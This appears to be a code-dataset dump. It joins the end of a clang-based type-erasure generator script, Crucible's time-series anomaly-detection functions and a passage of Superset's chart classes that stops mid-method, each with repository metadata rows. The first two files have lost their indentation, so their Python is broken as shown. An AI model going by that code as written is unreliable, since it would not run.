data.tu = index.parse(None, all_clang_args, options=clang.cindex.TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD)
data.filename = data.tu.spelling
if data.filename == '':
exit(1)
for diag in data.tu.diagnostics:
print_diagnostic(diag)
includes = [archetypes_lines[x.location.line - 1] for x in data.tu.get_includes() if x.depth == 1]
for include in includes:
output[0] += include
visit(data.tu.cursor)
if data.current_struct != null_cursor:
close_struct()
while len(data.current_namespaces):
data.current_namespaces.pop()
close_namespace()
if include_guarded:
output[0] += '#endif\n'
if not args.out_file:
    print(output[0])
else:
ofs = open(args.out_file, 'w')
ofs.write(output[0])
|
tzlaine/type_erasure
|
emtypen/emtypen.py
|
Python
|
mit
| 17,634
|
[
"VisIt"
] |
4873371b3d7d26807c8bf78ad2855a7c32765a79d55ba3d9530fd65349f82a1a
|
import pandas
import numpy as np
import scipy
import statsmodels.api as sm
import matplotlib.pyplot as plt
import traceback
import os
from multiprocessing import Process
from time import time
from settings import ALGORITHMS
from os.path import dirname, join, abspath
"""
This is no man's land. Do anything you want in here,
as long as you return a boolean that determines whether the input
timeseries is anomalous or not.
To add an algorithm, define it here, and add its name to settings.ALGORITHMS.
"""
def tail_avg(timeseries):
"""
This is a utility function used to calculate the average of the last three
datapoints in the series as a measure, instead of just the last datapoint.
It reduces noise, but it also reduces sensitivity and increases the delay
to detection.
"""
try:
t = (timeseries[-1][1] + timeseries[-2][1] + timeseries[-3][1]) / 3
return t
except IndexError:
return timeseries[-1][1]
def median_absolute_deviation(timeseries):
"""
A timeseries is anomalous if the deviation of its latest datapoint with
respect to the median is X times larger than the median of deviations.
"""
series = pandas.Series([x[1] for x in timeseries])
median = series.median()
demedianed = np.abs(series - median)
median_deviation = demedianed.median()
# The test statistic is infinite when the median is zero,
# so it becomes super sensitive. We play it safe and skip when this happens.
if median_deviation == 0:
return False
test_statistic = demedianed.iget(-1) / median_deviation
# Completely arbitary...triggers if the median deviation is
# 6 times bigger than the median
if test_statistic > 6:
return True
def grubbs(timeseries):
"""
    A timeseries is anomalous if the Z score is greater than the Grubbs score.
"""
series = scipy.array([x[1] for x in timeseries])
stdDev = scipy.std(series)
mean = np.mean(series)
tail_average = tail_avg(timeseries)
z_score = (tail_average - mean) / stdDev
len_series = len(series)
threshold = scipy.stats.t.isf(.05 / (2 * len_series) , len_series - 2)
threshold_squared = threshold * threshold
grubbs_score = ((len_series - 1) / np.sqrt(len_series)) * np.sqrt(threshold_squared / (len_series - 2 + threshold_squared))
return z_score > grubbs_score
def first_hour_average(timeseries):
"""
    Calculate the simple average over one hour, FULL_DURATION seconds ago.
A timeseries is anomalous if the average of the last three datapoints
are outside of three standard deviations of this value.
"""
last_hour_threshold = time() - (86400 - 3600)
series = pandas.Series([x[1] for x in timeseries if x[0] < last_hour_threshold])
mean = (series).mean()
stdDev = (series).std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_average(timeseries):
"""
    A timeseries is anomalous if the absolute value of the average of the latest
    three datapoints minus the series mean is greater than three standard
    deviations of the series. This does not exponentially weight the mean and so
    is better for detecting anomalies with respect to the entire series.
"""
series = pandas.Series([x[1] for x in timeseries])
mean = series.mean()
stdDev = series.std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_moving_average(timeseries):
"""
    A timeseries is anomalous if the absolute value of the latest datapoint
    minus the exponentially weighted moving average is greater than three
    standard deviations of the moving average. This is better for finding
    anomalies with respect to the short term trends.
"""
series = pandas.Series([x[1] for x in timeseries])
expAverage = pandas.stats.moments.ewma(series, com=50)
stdDev = pandas.stats.moments.ewmstd(series, com=50)
return abs(series.iget(-1) - expAverage.iget(-1)) > 3 * stdDev.iget(-1)
def mean_subtraction_cumulation(timeseries):
"""
    A timeseries is anomalous if the value of the next datapoint in the
    series is farther than three standard deviations out in cumulative terms
    after subtracting the mean from each data point.
"""
series = pandas.Series([x[1] if x[1] else 0 for x in timeseries])
series = series - series[0:len(series) - 1].mean()
stdDev = series[0:len(series) - 1].std()
expAverage = pandas.stats.moments.ewma(series, com=15)
return abs(series.iget(-1)) > 3 * stdDev
def least_squares(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints
on a projected least squares model is greater than three sigma.
"""
x = np.array([t[0] for t in timeseries])
y = np.array([t[1] for t in timeseries])
A = np.vstack([x, np.ones(len(x))]).T
    results = np.linalg.lstsq(A, y)
    m, c = results[0]
errors = []
for i, value in enumerate(y):
projected = m * x[i] + c
error = value - projected
errors.append(error)
if len(errors) < 3:
return False
std_dev = scipy.std(errors)
t = (errors[-1] + errors[-2] + errors[-3]) / 3
return abs(t) > std_dev * 3 and round(std_dev) != 0 and round(t) != 0
def histogram_bins(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints falls
into a histogram bin with less than 20 other datapoints (you'll need to tweak
that number depending on your data)
Returns: the size of the bin which contains the tail_avg. Smaller bin size
means more anomalous.
"""
series = scipy.array([x[1] for x in timeseries])
t = tail_avg(timeseries)
h = np.histogram(series, bins=15)
bins = h[1]
for index, bin_size in enumerate(h[0]):
if bin_size <= 20:
# Is it in the first bin?
if index == 0:
if t <= bins[0]:
return True
# Is it in the current bin?
elif t >= bins[index] and t < bins[index + 1]:
return True
return False
def ks_test(timeseries):
"""
A timeseries is anomalous if 2 sample Kolmogorov-Smirnov test indicates
that data distribution for last 10 minutes is different from last hour.
It produces false positives on non-stationary series so Augmented
Dickey-Fuller test applied to check for stationarity.
"""
hour_ago = time() - 3600
ten_minutes_ago = time() - 600
reference = scipy.array([x[1] for x in timeseries if x[0] >= hour_ago and x[0] < ten_minutes_ago])
probe = scipy.array([x[1] for x in timeseries if x[0] >= ten_minutes_ago])
if reference.size < 20 or probe.size < 20:
return False
ks_d,ks_p_value = scipy.stats.ks_2samp(reference, probe)
if ks_p_value < 0.05 and ks_d > 0.5:
adf = sm.tsa.stattools.adfuller(reference, 10)
if adf[1] < 0.05:
return True
return False
def run_algorithms(timeseries, timeseries_name):
"""
Iteratively run algorithms.
"""
__results__ = abspath(join(dirname( __file__ ), '..', 'results'))
try:
for algorithm in ALGORITHMS:
x_vals = np.arange(len(timeseries))
y_vals = np.array([y[1] for y in timeseries])
plt.plot(x_vals, y_vals)
# Start a couple datapoints in for the tail average
for index in range(10, len(timeseries)):
sliced = timeseries[:index]
anomaly = globals()[algorithm](sliced)
# Point out the datapoint if it's anomalous
if anomaly:
plt.plot([index], [sliced[-1][1]], 'ro')
plt.savefig(__results__ + "/"+ algorithm + "-" + timeseries_name + ".png")
            print(algorithm)
except:
print("Algorithm error: " + traceback.format_exc())
|
astanway/crucible
|
src/algorithms.py
|
Python
|
mit
| 7,970
|
[
"ADF"
] |
be10a275facad9baefbf3bf93ce607bdb544afc7d94e27e2da192ca55c5bff19
|
"""This module contains the "Viz" objects
These objects represent the backend of all the visualizations that
Superset can render.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import hashlib
import logging
import traceback
import uuid
import zlib
from collections import OrderedDict, defaultdict
from itertools import product
from datetime import datetime, timedelta
import pandas as pd
import numpy as np
from flask import request
from flask_babel import lazy_gettext as _
from markdown import markdown
import simplejson as json
from six import string_types, PY3
from dateutil import relativedelta as rdelta
from superset import app, utils, cache, get_manifest_file
from superset.utils import DTTM_ALIAS
config = app.config
stats_logger = config.get('STATS_LOGGER')
class BaseViz(object):
"""All visualizations derive this base class"""
viz_type = None
verbose_name = "Base Viz"
credits = ""
is_timeseries = False
def __init__(self, datasource, form_data):
if not datasource:
raise Exception(_("Viz is missing a datasource"))
self.datasource = datasource
self.request = request
self.viz_type = form_data.get("viz_type")
self.form_data = form_data
self.query = ""
self.token = self.form_data.get(
'token', 'token_' + uuid.uuid4().hex[:8])
self.metrics = self.form_data.get('metrics') or []
self.groupby = self.form_data.get('groupby') or []
self.status = None
self.error_message = None
def get_df(self, query_obj=None):
"""Returns a pandas dataframe based on the query object"""
if not query_obj:
query_obj = self.query_obj()
self.error_msg = ""
self.results = None
timestamp_format = None
if self.datasource.type == 'table':
dttm_col = self.datasource.get_col(query_obj['granularity'])
if dttm_col:
timestamp_format = dttm_col.python_date_format
# The datasource here can be different backend but the interface is common
self.results = self.datasource.query(query_obj)
self.query = self.results.query
self.status = self.results.status
self.error_message = self.results.error_message
df = self.results.df
# Transform the timestamp we received from database to pandas supported
# datetime format. If no python_date_format is specified, the pattern will
# be considered as the default ISO date format
# If the datetime format is unix, the parse will use the corresponding
# parsing logic.
if df is None or df.empty:
self.status = utils.QueryStatus.FAILED
if not self.error_message:
self.error_message = "No data."
return pd.DataFrame()
else:
if DTTM_ALIAS in df.columns:
if timestamp_format in ("epoch_s", "epoch_ms"):
df[DTTM_ALIAS] = pd.to_datetime(df[DTTM_ALIAS], utc=False)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format)
if self.datasource.offset:
df[DTTM_ALIAS] += timedelta(hours=self.datasource.offset)
            df = df.replace([np.inf, -np.inf], np.nan)
df = df.fillna(0)
return df
def get_extra_filters(self):
extra_filters = self.form_data.get('extra_filters', [])
return {f['col']: f['val'] for f in extra_filters}
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
gb = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
columns = form_data.get("columns") or []
groupby = []
for o in gb + columns:
if o not in groupby:
groupby.append(o)
is_timeseries = self.is_timeseries
if DTTM_ALIAS in groupby:
groupby.remove(DTTM_ALIAS)
is_timeseries = True
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
# default order direction
order_desc = form_data.get("order_desc", True)
        # __from and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or ''
)
# Backward compatibility hack
since_words = since.split(' ')
grains = ['days', 'years', 'hours', 'day', 'year', 'weeks']
if (len(since_words) == 2 and since_words[1] in grains):
since += ' ago'
from_dttm = utils.parse_human_datetime(since)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm and to_dttm and from_dttm > to_dttm:
raise Exception(_("From date cannot be larger than to date"))
# extras are used to query elements specific to a datasource type
# for instance the extra where clause that applies only to Tables
extras = {
'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters', []),
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
filters = form_data.get('filters', [])
for col, vals in self.get_extra_filters().items():
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
'order_desc': order_desc
}
return d
@property
def cache_timeout(self):
if self.form_data.get('cache_timeout'):
return int(self.form_data.get('cache_timeout'))
if self.datasource.cache_timeout:
return self.datasource.cache_timeout
if (
hasattr(self.datasource, 'database') and
self.datasource.database.cache_timeout):
return self.datasource.database.cache_timeout
return config.get("CACHE_DEFAULT_TIMEOUT")
def get_json(self, force=False):
return json.dumps(
self.get_payload(force),
default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def cache_key(self):
s = str([(k, self.form_data[k]) for k in sorted(self.form_data.keys())])
return hashlib.md5(s.encode('utf-8')).hexdigest()
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
stats_logger.incr('loaded_from_cache')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
stats_logger.incr('loaded_from_source')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def json_dumps(self, obj):
return json.dumps(obj, default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def data(self):
"""This is the data object serialized to the js layer"""
content = {
'form_data': self.form_data,
'token': self.token,
'viz_name': self.viz_type,
'filter_select_enabled': self.datasource.filter_select_enabled,
}
return content
def get_csv(self):
df = self.get_df()
include_index = not isinstance(df.index, pd.RangeIndex)
return df.to_csv(index=include_index, **config.get('CSV_EXPORT'))
def get_data(self, df):
return []
@property
def json_data(self):
return json.dumps(self.data)
class TableViz(BaseViz):
"""A basic html table that is sortable and searchable"""
viz_type = "table"
verbose_name = _("Table View")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def should_be_timeseries(self):
fd = self.form_data
# TODO handle datasource-type-specific code in datasource
conditions_met = (
(fd.get('granularity') and fd.get('granularity') != 'all') or
(fd.get('granularity_sqla') and fd.get('time_grain_sqla'))
)
if fd.get('include_time') and not conditions_met:
raise Exception(_(
"Pick a granularity in the Time section or "
"uncheck 'Include Time'"))
return fd.get('include_time')
def query_obj(self):
d = super(TableViz, self).query_obj()
fd = self.form_data
if fd.get('all_columns') and (fd.get('groupby') or fd.get('metrics')):
raise Exception(_(
"Choose either fields to [Group By] and [Metrics] or "
"[Columns], not both"))
sort_by = fd.get('timeseries_limit_metric')
if fd.get('all_columns'):
d['columns'] = fd.get('all_columns')
d['groupby'] = []
order_by_cols = fd.get('order_by_cols') or []
d['orderby'] = [json.loads(t) for t in order_by_cols]
elif sort_by:
if sort_by not in d['metrics']:
d['metrics'] += [sort_by]
d['orderby'] = [(sort_by, not fd.get("order_desc", True))]
d['is_timeseries'] = self.should_be_timeseries()
return d
def get_data(self, df):
if not self.should_be_timeseries() and DTTM_ALIAS in df:
del df[DTTM_ALIAS]
return dict(
records=df.to_dict(orient="records"),
columns=list(df.columns),
)
def json_dumps(self, obj):
if self.form_data.get('all_columns'):
return json.dumps(obj, default=utils.json_iso_dttm_ser)
else:
return super(TableViz, self).json_dumps(obj)
class PivotTableViz(BaseViz):
"""A pivot table view, define your rows, columns and metrics"""
viz_type = "pivot_table"
verbose_name = _("Pivot Table")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def query_obj(self):
d = super(PivotTableViz, self).query_obj()
groupby = self.form_data.get('groupby')
columns = self.form_data.get('columns')
metrics = self.form_data.get('metrics')
if not columns:
columns = []
if not groupby:
groupby = []
if not groupby:
raise Exception(_("Please choose at least one \"Group by\" field "))
if not metrics:
raise Exception(_("Please choose at least one metric"))
if (
any(v in groupby for v in columns) or
any(v in columns for v in groupby)):
raise Exception(_("'Group By' and 'Columns' can't overlap"))
return d
def get_data(self, df):
if (
self.form_data.get("granularity") == "all" and
DTTM_ALIAS in df):
del df[DTTM_ALIAS]
df = df.pivot_table(
index=self.form_data.get('groupby'),
columns=self.form_data.get('columns'),
values=self.form_data.get('metrics'),
aggfunc=self.form_data.get('pandas_aggfunc'),
margins=self.form_data.get('pivot_margins'),
)
# Display metrics side by side with each column
if self.form_data.get('combine_metric'):
df = df.stack(0).unstack()
return dict(
columns=list(df.columns),
html=df.to_html(
na_rep='',
classes=(
"dataframe table table-striped table-bordered "
"table-condensed table-hover").split(" ")),
)
class MarkupViz(BaseViz):
"""Use html or markdown to create a free form widget"""
viz_type = "markup"
verbose_name = _("Markup")
is_timeseries = False
def get_df(self):
return True
def get_data(self, df):
markup_type = self.form_data.get("markup_type")
code = self.form_data.get("code", '')
if markup_type == "markdown":
code = markdown(code)
return dict(html=code, theme_css=get_manifest_file('theme.css'))
class SeparatorViz(MarkupViz):
"""Use to create section headers in a dashboard, similar to `Markup`"""
viz_type = "separator"
verbose_name = _("Separator")
class WordCloudViz(BaseViz):
"""Build a colorful word cloud
Uses the nice library at:
https://github.com/jasondavies/d3-cloud
"""
viz_type = "word_cloud"
verbose_name = _("Word Cloud")
is_timeseries = False
def query_obj(self):
d = super(WordCloudViz, self).query_obj()
d['metrics'] = [self.form_data.get('metric')]
d['groupby'] = [self.form_data.get('series')]
return d
def get_data(self, df):
# Ordering the columns
df = df[[self.form_data.get('series'), self.form_data.get('metric')]]
# Labeling the columns for uniform json schema
df.columns = ['text', 'size']
return df.to_dict(orient="records")
class TreemapViz(BaseViz):
"""Tree map visualisation for hierarchical data."""
viz_type = "treemap"
verbose_name = _("Treemap")
credits = '<a href="https://d3js.org">d3.js</a>'
is_timeseries = False
def _nest(self, metric, df):
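        # Recursively converts a (possibly MultiIndex'ed) frame into the
        # nested {"name": ..., "children"/"value": ...} records that d3
        # treemaps consume, peeling off one index level per recursion.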
nlevels = df.index.nlevels
if nlevels == 1:
result = [{"name": n, "value": v}
for n, v in zip(df.index, df[metric])]
else:
result = [{"name": l, "children": self._nest(metric, df.loc[l])}
for l in df.index.levels[0]]
return result
def get_data(self, df):
df = df.set_index(self.form_data.get("groupby"))
chart_data = [{"name": metric, "children": self._nest(metric, df)}
for metric in df.columns]
return chart_data
class CalHeatmapViz(BaseViz):
"""Calendar heatmap."""
viz_type = "cal_heatmap"
verbose_name = _("Calendar Heatmap")
credits = (
'<a href=https://github.com/wa0x6e/cal-heatmap>cal-heatmap</a>')
is_timeseries = True
def get_data(self, df):
form_data = self.form_data
df.columns = ["timestamp", "metric"]
        timestamps = {str(obj["timestamp"].value // 10**9):
                      obj.get("metric") for obj in df.to_dict("records")}
start = utils.parse_human_datetime(form_data.get("since"))
end = utils.parse_human_datetime(form_data.get("until"))
domain = form_data.get("domain_granularity")
diff_delta = rdelta.relativedelta(end, start)
diff_secs = (end - start).total_seconds()
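        # range_ approximates how many <domain> units the [start, end]
        # window spans, inclusive of the first unit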
if domain == "year":
range_ = diff_delta.years + 1
elif domain == "month":
range_ = diff_delta.years * 12 + diff_delta.months + 1
elif domain == "week":
range_ = diff_delta.years * 53 + diff_delta.weeks + 1
elif domain == "day":
range_ = diff_secs // (24*60*60) + 1
else:
range_ = diff_secs // (60*60) + 1
return {
"timestamps": timestamps,
"start": start,
"domain": domain,
"subdomain": form_data.get("subdomain_granularity"),
"range": range_,
}
def query_obj(self):
qry = super(CalHeatmapViz, self).query_obj()
qry["metrics"] = [self.form_data["metric"]]
return qry
class NVD3Viz(BaseViz):
"""Base class for all nvd3 vizs"""
credits = '<a href="http://nvd3.org/">NVD3.org</a>'
viz_type = None
verbose_name = "Base NVD3 Viz"
is_timeseries = False
class BoxPlotViz(NVD3Viz):
"""Box plot viz from ND3"""
viz_type = "box_plot"
verbose_name = _("Box Plot")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
label_sep = " - "
chart_data = []
for index_value, row in zip(df.index, df.to_dict(orient="records")):
if isinstance(index_value, tuple):
index_value = label_sep.join(index_value)
boxes = defaultdict(dict)
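            # row keys arrive as (metric label, stat name) pairs from the
            # groupby().agg(...) in get_data; regroup them per metric label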
for (label, key), value in row.items():
if key == "median":
key = "Q2"
boxes[label][key] = value
for label, box in boxes.items():
if len(self.form_data.get("metrics")) > 1:
# need to render data labels with metrics
chart_label = label_sep.join([index_value, label])
else:
chart_label = index_value
chart_data.append({
"label": chart_label,
"values": box,
})
return chart_data
def get_data(self, df):
form_data = self.form_data
df = df.fillna(0)
# conform to NVD3 names
def Q1(series): # need to be named functions - can't use lambdas
return np.percentile(series, 25)
def Q3(series):
return np.percentile(series, 75)
whisker_type = form_data.get('whisker_options')
if whisker_type == "Tukey":
def whisker_high(series):
upper_outer_lim = Q3(series) + 1.5 * (Q3(series) - Q1(series))
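                # Tukey whiskers end at the most extreme observation still
                # inside Q3 + 1.5 * IQR, not at the fence itself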
series = series[series <= upper_outer_lim]
return series[np.abs(series - upper_outer_lim).argmin()]
def whisker_low(series):
lower_outer_lim = Q1(series) - 1.5 * (Q3(series) - Q1(series))
# find the closest value above the lower outer limit
series = series[series >= lower_outer_lim]
return series[np.abs(series - lower_outer_lim).argmin()]
elif whisker_type == "Min/max (no outliers)":
def whisker_high(series):
return series.max()
def whisker_low(series):
return series.min()
elif " percentiles" in whisker_type:
low, high = whisker_type.replace(" percentiles", "").split("/")
def whisker_high(series):
return np.percentile(series, int(high))
def whisker_low(series):
return np.percentile(series, int(low))
else:
raise ValueError("Unknown whisker type: {}".format(whisker_type))
def outliers(series):
above = series[series > whisker_high(series)]
below = series[series < whisker_low(series)]
# pandas sometimes doesn't like getting lists back here
return set(above.tolist() + below.tolist())
aggregate = [Q1, np.median, Q3, whisker_high, whisker_low, outliers]
df = df.groupby(form_data.get('groupby')).agg(aggregate)
chart_data = self.to_series(df)
return chart_data
class BubbleViz(NVD3Viz):
"""Based on the NVD3 bubble chart"""
viz_type = "bubble"
verbose_name = _("Bubble Chart")
is_timeseries = False
def query_obj(self):
form_data = self.form_data
d = super(BubbleViz, self).query_obj()
d['groupby'] = [
form_data.get('entity')
]
if form_data.get('series'):
d['groupby'].append(form_data.get('series'))
self.x_metric = form_data.get('x')
self.y_metric = form_data.get('y')
self.z_metric = form_data.get('size')
self.entity = form_data.get('entity')
self.series = form_data.get('series') or self.entity
d['row_limit'] = form_data.get('limit')
d['metrics'] = [
self.z_metric,
self.x_metric,
self.y_metric,
]
if not all(d['metrics'] + [self.entity]):
raise Exception(_("Pick a metric for x, y and size"))
return d
def get_data(self, df):
        df['x'] = df[self.x_metric]
        df['y'] = df[self.y_metric]
        df['size'] = df[self.z_metric]
        df['shape'] = 'circle'
        df['group'] = df[self.series]
series = defaultdict(list)
for row in df.to_dict(orient='records'):
series[row['group']].append(row)
chart_data = []
for k, v in series.items():
chart_data.append({
'key': k,
'values': v})
return chart_data
class BulletViz(NVD3Viz):
"""Based on the NVD3 bullet chart"""
viz_type = "bullet"
verbose_name = _("Bullet Chart")
is_timeseries = False
def query_obj(self):
form_data = self.form_data
d = super(BulletViz, self).query_obj()
self.metric = form_data.get('metric')
def as_strings(field):
value = form_data.get(field)
return value.split(',') if value else []
def as_floats(field):
return [float(x) for x in as_strings(field)]
self.ranges = as_floats('ranges')
self.range_labels = as_strings('range_labels')
self.markers = as_floats('markers')
self.marker_labels = as_strings('marker_labels')
self.marker_lines = as_floats('marker_lines')
self.marker_line_labels = as_strings('marker_line_labels')
d['metrics'] = [
self.metric,
]
if not self.metric:
raise Exception(_("Pick a metric to display"))
return d
def get_data(self, df):
df = df.fillna(0)
        df['metric'] = df[self.metric]
values = df['metric'].values
return {
'measures': values.tolist(),
'ranges': self.ranges or [0, values.max() * 1.1],
'rangeLabels': self.range_labels or None,
'markers': self.markers or None,
'markerLabels': self.marker_labels or None,
'markerLines': self.marker_lines or None,
'markerLineLabels': self.marker_line_labels or None,
}
class BigNumberViz(BaseViz):
"""Put emphasis on a single metric with this big number viz"""
viz_type = "big_number"
verbose_name = _("Big Number with Trendline")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = True
def query_obj(self):
d = super(BigNumberViz, self).query_obj()
metric = self.form_data.get('metric')
if not metric:
raise Exception(_("Pick a metric!"))
d['metrics'] = [self.form_data.get('metric')]
self.form_data['metric'] = metric
return d
def get_data(self, df):
form_data = self.form_data
df.sort_values(by=df.columns[0], inplace=True)
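        # the first column is the timestamp, so this orders the trendline
        # chronologically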
compare_lag = form_data.get("compare_lag")
return {
'data': df.values.tolist(),
'compare_lag': compare_lag,
'compare_suffix': form_data.get('compare_suffix', ''),
}
class BigNumberTotalViz(BaseViz):
"""Put emphasis on a single metric with this big number viz"""
viz_type = "big_number_total"
verbose_name = _("Big Number")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def query_obj(self):
d = super(BigNumberTotalViz, self).query_obj()
metric = self.form_data.get('metric')
if not metric:
raise Exception(_("Pick a metric!"))
d['metrics'] = [self.form_data.get('metric')]
self.form_data['metric'] = metric
return d
def get_data(self, df):
form_data = self.form_data
df.sort_values(by=df.columns[0], inplace=True)
return {
'data': df.values.tolist(),
'subheader': form_data.get('subheader', ''),
}
class NVD3TimeSeriesViz(NVD3Viz):
"""A rich line chart component with tons of options"""
viz_type = "line"
verbose_name = _("Time Series - Line Chart")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
for name in df.T.index.tolist():
ys = series[name]
if df[name].dtype.kind not in "biufc":
continue
if isinstance(name, string_types):
series_title = name
else:
name = ["{}".format(s) for s in name]
if len(self.form_data.get('metrics')) > 1:
series_title = ", ".join(name)
else:
series_title = ", ".join(name[1:])
if title_suffix:
series_title += title_suffix
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
}
chart_data.append(d)
return chart_data
def process_data(self, df):
fd = self.form_data
df = df.fillna(0)
if fd.get("granularity") == "all":
raise Exception(_("Pick a time granularity for your time series"))
df = df.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
fm = fd.get("resample_fillmethod")
if not fm:
fm = None
how = fd.get("resample_how")
rule = fd.get("resample_rule")
if how and rule:
df = df.resample(rule, how=how, fill_method=fm)
if not fm:
df = df.fillna(0)
if self.sort_series:
dfs = df.sum()
dfs.sort_values(ascending=False, inplace=True)
df = df[dfs.index]
if fd.get("contribution"):
dft = df.T
df = (dft / dft.sum()).T
rolling_type = fd.get("rolling_type")
rolling_periods = int(fd.get("rolling_periods") or 0)
min_periods = int(fd.get("min_periods") or 0)
if rolling_type in ('mean', 'std', 'sum') and rolling_periods:
kwargs = dict(
arg=df,
window=rolling_periods,
min_periods=min_periods)
if rolling_type == 'mean':
df = pd.rolling_mean(**kwargs)
elif rolling_type == 'std':
df = pd.rolling_std(**kwargs)
elif rolling_type == 'sum':
df = pd.rolling_sum(**kwargs)
elif rolling_type == 'cumsum':
df = df.cumsum()
if min_periods:
df = df[min_periods:]
num_period_compare = fd.get("num_period_compare")
if num_period_compare:
num_period_compare = int(num_period_compare)
prt = fd.get('period_ratio_type')
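            # 'growth' -> percent change vs. N periods ago, 'value' ->
            # absolute difference, anything else -> plain ratio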
if prt and prt == 'growth':
df = (df / df.shift(num_period_compare)) - 1
elif prt and prt == 'value':
df = df - df.shift(num_period_compare)
else:
df = df / df.shift(num_period_compare)
df = df[num_period_compare:]
return df
def get_data(self, df):
fd = self.form_data
df = self.process_data(df)
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
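            # shift the comparison frame forward by the same delta so both
            # series line up on the chart's x axis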
df2 = self.process_data(df2)
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
class NVD3DualLineViz(NVD3Viz):
"""A rich line chart with dual axis"""
viz_type = "dual_line"
verbose_name = _("Time Series - Dual Axis Line Chart")
sort_series = False
is_timeseries = True
def query_obj(self):
d = super(NVD3DualLineViz, self).query_obj()
m1 = self.form_data.get('metric')
m2 = self.form_data.get('metric_2')
d['metrics'] = [m1, m2]
if not m1:
raise Exception(_("Pick a metric for left axis!"))
if not m2:
raise Exception(_("Pick a metric for right axis!"))
if m1 == m2:
raise Exception(_("Please choose different metrics"
" on left and right axis"))
return d
def to_series(self, df, classed=''):
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
metrics = [
self.form_data.get('metric'),
self.form_data.get('metric_2')
]
for i, m in enumerate(metrics):
ys = series[m]
if df[m].dtype.kind not in "biufc":
continue
series_title = m
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
"yAxis": i+1,
"type": "line"
}
chart_data.append(d)
return chart_data
def get_data(self, df):
fd = self.form_data
df = df.fillna(0)
if self.form_data.get("granularity") == "all":
